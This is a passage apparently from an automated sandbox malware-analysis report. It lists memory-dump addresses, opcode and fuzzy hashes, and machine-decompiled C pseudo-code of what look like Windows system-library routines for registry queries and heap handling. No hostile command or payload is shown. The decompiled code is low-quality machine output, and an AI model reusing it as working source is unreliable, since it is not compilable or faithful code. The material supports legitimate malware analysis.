                                                                          0x011e4e10
                                                                          0x011e4e10
                                                                          0x011e4e1c
                                                                          0x011e4e1f
                                                                          0x011e4e35
                                                                          0x011e4e35
                                                                          0x011e4e1f
                                                                          0x011e4df8
                                                                          0x011a04f1
                                                                          0x011a04fa
                                                                          0x011e4e3f
                                                                          0x011e4e47
                                                                          0x011e4e5b
                                                                          0x011e4e61
                                                                          0x011e4e67
                                                                          0x011e4e69
                                                                          0x011e4e71
                                                                          0x011e4e73
                                                                          0x011a0500
                                                                          0x011a0500
                                                                          0x011a0500
                                                                          0x011a04fa
                                                                          0x011a0508
                                                                          0x011a051d
                                                                          0x011a051d
                                                                          0x011a051f
                                                                          0x011a0524
                                                                          0x00000000
                                                                          0x011a0524
                                                                          0x011a0515
                                                                          0x011a0517
                                                                          0x011e4e7a
                                                                          0x011e4e7c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011e4e85
                                                                          0x00000000
                                                                          0x011e4e85
                                                                          0x00000000
                                                                          0x011a0517

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 04c62711faa0a4fddd1903ef55688801ca0048a805f77a8f786e34854861c9ea
                                                                          • Instruction ID: f5e0ab88602d1a16d4721efc26b93c010a9705ae87355662abcd44191c178695
                                                                          • Opcode Fuzzy Hash: 04c62711faa0a4fddd1903ef55688801ca0048a805f77a8f786e34854861c9ea
                                                                          • Instruction Fuzzy Hash: 6A910535E006159FEB3E9AACD848BAD7FE4BB09728F050265FA50E76D1D7749C00C781
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0117C600, Relevance: .2, Instructions: 225COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 67%
                                                                          			E0117C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x126d360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E01186D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E011BB640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x1267b9c; // 0x0
					_t74 = L01194620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E011B9650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L011977F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E011BF3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E011B13C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L011977F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E011B9650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}










































                                                                          0x0117c608
                                                                          0x0117c615
                                                                          0x0117c625
                                                                          0x0117c62d
                                                                          0x0117c635
                                                                          0x0117c640
                                                                          0x0117c680
                                                                          0x0117c687
                                                                          0x0117c688
                                                                          0x0117c689
                                                                          0x0117c694
                                                                          0x0117c694
                                                                          0x0117c642
                                                                          0x0117c64a
                                                                          0x0117c697
                                                                          0x011e7a25
                                                                          0x011e7a2b
                                                                          0x011e7a2e
                                                                          0x011e7a30
                                                                          0x011e7bea
                                                                          0x011e7bea
                                                                          0x00000000
                                                                          0x011e7bea
                                                                          0x011e7a36
                                                                          0x011e7a43
                                                                          0x011e7a48
                                                                          0x011e7a4c
                                                                          0x011e7a4e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011e7a58
                                                                          0x011e7a5a
                                                                          0x011e7a5b
                                                                          0x011e7a5c
                                                                          0x011e7a5d
                                                                          0x011e7a63
                                                                          0x011e7a64
                                                                          0x011e7a6a
                                                                          0x011e7a6c
                                                                          0x011e7a6e
                                                                          0x011e79cb
                                                                          0x011e79cb
                                                                          0x011e79ce
                                                                          0x011e79d0
                                                                          0x011e7a98
                                                                          0x011e7a9b
                                                                          0x011e7a9b
                                                                          0x011e7a9e
                                                                          0x011e7aa1
                                                                          0x011e7bbe
                                                                          0x011e7bbe
                                                                          0x011e7bc0
                                                                          0x011e7be0
                                                                          0x011e7be0
                                                                          0x011e7a01
                                                                          0x011e7a01
                                                                          0x011e7a05
                                                                          0x011e7a07
                                                                          0x011e7a15
                                                                          0x011e7a15
                                                                          0x011e7a1a
                                                                          0x00000000
                                                                          0x011e7a1a
                                                                          0x011e7bc2
                                                                          0x011e7bc6
                                                                          0x011e7bc9
                                                                          0x011e7bcd
                                                                          0x011e7bcf
                                                                          0x011e79e6
                                                                          0x011e79e6
                                                                          0x011e79eb
                                                                          0x011e79eb
                                                                          0x011e79ef
                                                                          0x011e79f1
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011e79f3
                                                                          0x011e79f5
                                                                          0x011e79ff
                                                                          0x011e79ff
                                                                          0x00000000
                                                                          0x011e79ff
                                                                          0x011e79f7
                                                                          0x011e79fd
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011e79fd
                                                                          0x011e7bd5
                                                                          0x011e7bd8
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011e7ba9
                                                                          0x011e7bac
                                                                          0x011e7bb0
                                                                          0x011e7bb1
                                                                          0x011e7bb1
                                                                          0x011e7bb6
                                                                          0x00000000
                                                                          0x011e7bb6
                                                                          0x011e7aa7
                                                                          0x011e7aaa
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011e7ab2
                                                                          0x011e7ab3
                                                                          0x011e7ab5
                                                                          0x011e7aec
                                                                          0x011e7aef
                                                                          0x011e7b25
                                                                          0x011e7b28
                                                                          0x011e7b62
                                                                          0x011e7b64
                                                                          0x011e7b8f
                                                                          0x011e7b92
                                                                          0x011e7b96
                                                                          0x011e7b98
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011e7b9e
                                                                          0x011e7b9f
                                                                          0x011e7ba3
                                                                          0x00000000
                                                                          0x011e7ba3
                                                                          0x011e7b66
                                                                          0x011e7b68
                                                                          0x011e7ae2
                                                                          0x011e7ae2
                                                                          0x00000000
                                                                          0x011e7ae2
                                                                          0x011e7b6e
                                                                          0x011e7b72
                                                                          0x011e7b75
                                                                          0x011e7b81
                                                                          0x011e7b85
                                                                          0x011e7b87
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011e7b31
                                                                          0x011e7b34
                                                                          0x011e7b3c
                                                                          0x011e7b45
                                                                          0x011e7b46
                                                                          0x011e7b4f
                                                                          0x011e7b51
                                                                          0x011e7b57
                                                                          0x011e7b59
                                                                          0x011e7b59
                                                                          0x00000000
                                                                          0x011e7b59
                                                                          0x011e7b77
                                                                          0x00000000
                                                                          0x011e7b77
                                                                          0x011e7b2a
                                                                          0x00000000
                                                                          0x011e7b2a
                                                                          0x011e7af1
                                                                          0x011e7af3
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011e7afb
                                                                          0x011e7afc
                                                                          0x011e7afe
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011e7b00
                                                                          0x011e7b03
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011e7b05
                                                                          0x011e7b09
                                                                          0x011e7b0d
                                                                          0x011e7b0f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011e7b18
                                                                          0x011e7b1d
                                                                          0x00000000
                                                                          0x011e7b1d
                                                                          0x011e7ab7
                                                                          0x011e7ab9
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011e7abf
                                                                          0x011e7ac1
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011e7ac3
                                                                          0x011e7ac6
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011e7ac8
                                                                          0x011e7acc
                                                                          0x011e7ad0
                                                                          0x011e7ad2
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011e7adb
                                                                          0x00000000
                                                                          0x011e7adb
                                                                          0x011e79d6
                                                                          0x011e79d9
                                                                          0x011e79dc
                                                                          0x011e7a91
                                                                          0x011e7a94
                                                                          0x00000000
                                                                          0x011e7a94
                                                                          0x011e79e2
                                                                          0x00000000
                                                                          0x011e79e2
                                                                          0x011e7a74
                                                                          0x011e7a7a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011e7a8a
                                                                          0x011e7a21
                                                                          0x011e7a21
                                                                          0x00000000
                                                                          0x011e7a21
                                                                          0x0117c650
                                                                          0x0117c651
                                                                          0x0117c656
                                                                          0x0117c65c
                                                                          0x0117c65d
                                                                          0x0117c663
                                                                          0x0117c664
                                                                          0x0117c66a
                                                                          0x0117c66e
                                                                          0x011e79c5
                                                                          0x011e79c7
                                                                          0x00000000
                                                                          0x011e79c7
                                                                          0x0117c67a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bdb7893d6df3bd53eec0e7943706e978e2d002ae22418f2075891402fa25e750
                                                                          • Instruction ID: 51970e62e934ce6d4e38133ab3bea4449a47e7c00d991d39a4c23178ccbc052c
                                                                          • Opcode Fuzzy Hash: bdb7893d6df3bd53eec0e7943706e978e2d002ae22418f2075891402fa25e750
                                                                          • Instruction Fuzzy Hash: 3A81A575604A428BEB2ECE98C884A7B77E5EF84354F19481AFE459B381E330DD41CBD2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0120B8D0, Relevance: .2, Instructions: 199COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 39%
                                                                          			E0120B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x1267b9c; // 0x0
				_t124 = L01194620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E011B9800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E011B95B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E011B95D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L011977F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E011B9910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E011B95D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x1267b9c; // 0x0
									_t92 = L01194620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E011B9910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E0117A7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E0120E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E0120E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E011B95B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                                                                          0x0120b8d9
                                                                          0x0120b8e4
                                                                          0x00000000
                                                                          0x0120b8e6
                                                                          0x0120b8f3
                                                                          0x0120b8f5
                                                                          0x0120b8f5
                                                                          0x0120b8f8
                                                                          0x0120b920
                                                                          0x0120b924
                                                                          0x0120b936
                                                                          0x0120b939
                                                                          0x0120b93d
                                                                          0x0120b948
                                                                          0x0120b9a0
                                                                          0x0120b9a0
                                                                          0x0120b9a4
                                                                          0x0120b9bf
                                                                          0x0120b9c4
                                                                          0x0120b9c6
                                                                          0x0120b9cd
                                                                          0x0120b9d1
                                                                          0x0120bad4
                                                                          0x0120bad8
                                                                          0x0120bada
                                                                          0x0120badc
                                                                          0x0120badc
                                                                          0x0120badf
                                                                          0x0120bae0
                                                                          0x0120bae2
                                                                          0x0120bae4
                                                                          0x0120baec
                                                                          0x0120baee
                                                                          0x0120baf0
                                                                          0x0120baf0
                                                                          0x0120baec
                                                                          0x0120bafb
                                                                          0x0120bafc
                                                                          0x0120bafe
                                                                          0x0120bb01
                                                                          0x0120bb01
                                                                          0x00000000
                                                                          0x0120bb06
                                                                          0x0120b9d7
                                                                          0x0120b9db
                                                                          0x0120b9db
                                                                          0x0120b9de
                                                                          0x0120b9de
                                                                          0x0120b9e4
                                                                          0x0120b9e7
                                                                          0x0120b9ea
                                                                          0x0120b9ec
                                                                          0x0120b9ef
                                                                          0x0120b9f3
                                                                          0x0120ba1b
                                                                          0x0120ba1b
                                                                          0x0120ba23
                                                                          0x0120ba24
                                                                          0x0120ba27
                                                                          0x0120ba2a
                                                                          0x0120ba2b
                                                                          0x0120ba2e
                                                                          0x0120ba30
                                                                          0x0120ba37
                                                                          0x0120ba3f
                                                                          0x0120ba9c
                                                                          0x0120baa2
                                                                          0x0120bb13
                                                                          0x0120bb15
                                                                          0x0120baae
                                                                          0x0120baae
                                                                          0x0120bab3
                                                                          0x0120bab5
                                                                          0x0120baba
                                                                          0x0120bac8
                                                                          0x0120bac8
                                                                          0x0120baba
                                                                          0x0120bacd
                                                                          0x0120bacf
                                                                          0x00000000
                                                                          0x0120bacf
                                                                          0x0120bb1a
                                                                          0x00000000
                                                                          0x0120bb1c
                                                                          0x0120baa7
                                                                          0x0120bb11
                                                                          0x00000000
                                                                          0x0120bb11
                                                                          0x0120baa9
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0120ba41
                                                                          0x0120ba41
                                                                          0x0120ba41
                                                                          0x0120ba58
                                                                          0x0120ba5d
                                                                          0x0120ba62
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0120ba64
                                                                          0x0120ba67
                                                                          0x0120ba68
                                                                          0x0120ba69
                                                                          0x0120ba6c
                                                                          0x0120ba6f
                                                                          0x0120ba71
                                                                          0x0120ba78
                                                                          0x0120ba80
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0120ba90
                                                                          0x0120ba90
                                                                          0x0120ba97
                                                                          0x00000000
                                                                          0x0120ba97
                                                                          0x0120b9f5
                                                                          0x0120b9f7
                                                                          0x0120b9f7
                                                                          0x0120b9fa
                                                                          0x0120ba03
                                                                          0x0120ba07
                                                                          0x0120ba0c
                                                                          0x0120ba10
                                                                          0x0120ba17
                                                                          0x00000000
                                                                          0x0120b9f7
                                                                          0x0120b9a6
                                                                          0x0120b9a8
                                                                          0x0120b9af
                                                                          0x0120b9b3
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0120b9b9
                                                                          0x00000000
                                                                          0x0120b9b9
                                                                          0x0120b94d
                                                                          0x0120b98f
                                                                          0x0120b995
                                                                          0x0120b999
                                                                          0x0120b960
                                                                          0x0120b967
                                                                          0x0120b968
                                                                          0x0120b96a
                                                                          0x00000000
                                                                          0x0120b96a
                                                                          0x0120b99b
                                                                          0x0120b99e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0120b99e
                                                                          0x0120b951
                                                                          0x0120b954
                                                                          0x0120b95a
                                                                          0x0120b95e
                                                                          0x0120b972
                                                                          0x0120b979
                                                                          0x0120b97d
                                                                          0x0120b97f
                                                                          0x0120b980
                                                                          0x0120b982
                                                                          0x0120b984
                                                                          0x00000000
                                                                          0x0120b984
                                                                          0x00000000
                                                                          0x0120b926
                                                                          0x00000000
                                                                          0x0120b926

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d1b39d9003b9db0c736506dad0ee90853106c719c6838f3f987e06000a792707
                                                                          • Instruction ID: 645051575362603a624d40a43ea2eb08570af3ca0dd27faf9010b14370bdd7c0
                                                                          • Opcode Fuzzy Hash: d1b39d9003b9db0c736506dad0ee90853106c719c6838f3f987e06000a792707
                                                                          • Instruction Fuzzy Hash: FA71223A260B06AFE736CF18C885F56BBA5EF44724F104628E755876E2EB70E941CB50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011752A5, Relevance: .2, Instructions: 161COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 78%
                                                                          			E011752A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E0118EEF0(0x12679a0);
					_t104 =  *0x1268210; // 0xd02d00
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E0118EB70(_t93, 0x12679a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E011B9890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E0118EEF0(0x12679a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E0118EB70(0, 0x12679a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0xd02d0d
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E011AF0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E0118EEF0(0x12679a0);
									__eflags =  *0x1268210 - _t104; // 0xd02d00
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x1268210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E011F4888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E0118EB70(_t95, 0x12679a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E011B95D0();
											L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E011B95D0();
											L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E0118EB70(_t93, 0x12679a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E011B95D0();
										L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E011B95D0();
										L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E011AF0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
